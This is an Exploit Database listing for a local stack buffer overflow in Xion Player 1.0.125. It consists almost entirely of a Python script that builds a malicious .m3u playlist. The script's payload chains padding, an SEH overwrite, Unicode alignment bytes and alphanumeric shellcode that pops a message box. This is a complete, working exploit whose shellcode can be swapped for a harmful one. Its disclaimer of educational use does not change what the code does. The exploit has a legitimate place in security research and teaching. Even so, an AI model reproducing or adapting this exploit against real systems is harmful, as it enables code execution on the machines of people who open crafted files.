Xion Player 1.0.125 – Local Stack Buffer Overflow

• Exploit Database
• 17 阅读

• 作者： corelanc0d3r
  日期： 2010-08-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14633/

• #!/usr/bin/python
  # #######################################################################
  # Title:Xion 1.0.125 Stack Buffer Overflow
  # Date: August 13, 2010
  # Author: corelanc0d3r and dijital1
  # Grtz to dijital1 : I had a lot of fun working with
  # you on this one ! :)
  # Grtz to dookie2000ca :)
  # Original Advisory:http://www.exploit-db.com/exploits/14517 (hadji samir)
  # Platform: Windows XP SP3 En Professional - VirtualBox
  # Greetz to:Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  # #######################################################################
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # Corelan does not want anyone to use this script
  # for malicious and/or illegal purposes
  # Corelan cannot be held responsible for any illegal use.
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  #
  
  print "|------------------------------------------------------------------|"
  print "| __ __|"
  print "| _________________/ /___ _____ / /________ _____ ___|"
  print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |"
  print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|"
  print "||"
  print "| http://www.corelan.be:8800 |"
  print "|security@corelan.be |"
  print "||"
  print "|-------------------------------------------------[ EIP Hunters ]--|"
  print " -= Exploit for Xion 1.0.125 - Unicode (SEH) - corelanc0d3r =-"
  print ""
  print " [+] Preparing payload..."
  outputfile="corelanc0d3r.m3u"
  offset_to_nseh=250 #affected by the m3u path length !
  junk = "A" * offset_to_nseh
  nseh="\x41\x45"
  seh="\x93\x47" #Unicode conversion : 0x0047201C => mov eax,esi + ppr
  junk2="\x45"
  align="\x55"#push ebp
  align=align+"\x6d"#pad (ebp is writable)
  align=align+"\x58"#pop eax
  align=align+"\x6d"
  align=align+"\x05\x25\x11"
  align=align+"\x6d"
  align=align+"\x2d\x11\x11" 
  align=align+"\x6d"
  align=align+"\x50\x6d\xc3"#go!
  align=align+"I"*56
  #msgbox
  shellcode="PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AI"
  shellcode+="AIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhYzKskhY4"
  shellcode+="4nDJTLq6rfRajNQuyOtTKQaP0TKt6LLTKQfkl2koVJh4K3NO02kOFOHpOKhrUJS29Z"
  shellcode+="axQyo8as0DK0lNDKtDKOUMlBkntKUqhKQxjBkmzJxdKQJKpkQzKgsP7MyDKltDKjaJ"
  shellcode+="NLqkO017PKLVL2dGPQdKZWQ6olMkQI7xizQ9oyoKOOKSLktmX45GnDKQJktjaHkpfD"
  shellcode+="KlL0KrkNzMLiqZKBkyt4KM1iX2iMtKtkloqVcVRlHNIhT3YHe1ywRoxdNNnZnJLr2W"
  shellcode+="x5LKOIoKOqymuitEkSNvxgrd357KlktobYXDKIokOKOu9oUyx0hplplo0yoQXNSoBL"
  shellcode+="nC4QXPupsS52R58aLMTlJqyJFR6KOaEKTqyWRB07KUXW2NmwLDGMLktpRWxQNKOkOi"
  shellcode+="orHnxKpo0Kpph1DS5s1BMphplc1PnmPoxpCrOprpeNQIKDHOlktZl4IK3aXrRNxMPO"
  shellcode+="0oxbCNPOtMcQXREplOqpn38mPOsPobRQXbDKps2RY0hNoD7pn35May9sXPLO4ju2iY"
  shellcode+="QNQyBobOcnqQB9o8PNQY00PIoPUyxKZA"
  
  junk3="\x49"*2550
  
  payload=junk+nseh+seh+junk2+align+shellcode+junk3
  print " [+] Writing payload to file "+outputfile+" (" + str(len(payload))+" bytes)"
  FILE = open(outputfile, "w")
  FILE.write(payload)
  FILE.close()
  print " [+] Done"